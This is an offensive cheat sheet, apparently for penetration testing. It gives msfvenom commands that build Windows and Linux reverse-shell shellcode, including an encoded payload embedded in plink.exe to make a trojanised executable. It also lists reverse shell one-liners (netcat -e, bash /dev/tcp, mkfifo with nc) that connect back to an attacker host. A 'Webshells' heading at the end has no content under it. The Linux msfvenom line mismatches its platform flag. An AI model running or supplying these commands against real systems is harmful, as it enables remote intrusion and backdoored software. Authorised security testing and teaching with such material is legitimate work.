Generate shellcodes

Windows

msfvenom -a x86 --platform Windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

msfvenom -p windows/shell_reverse_tcp -f exe \
    -e x86/shikata_ga_nai -i 9 \
    -x /usr/share/windows-binaries/plink.exe -o reverse.exe \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Generate shellcode with specified size in python format

msfvenom -a x86 --platform windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -s $PAYLOAD_SIZE \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    | msfvenom -a x86 --platform Windows -f python -v shellcode

Linux

msfvenom -a x86 --platform Windows \
    -p linux/x86/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Reverse shell commands

nc $ATTACKER_IP 443 -e /bin/bash

If netcat is not on the target system:

/bin/bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP $ATTACKER_PORT >/tmp/f

Webshells

Commands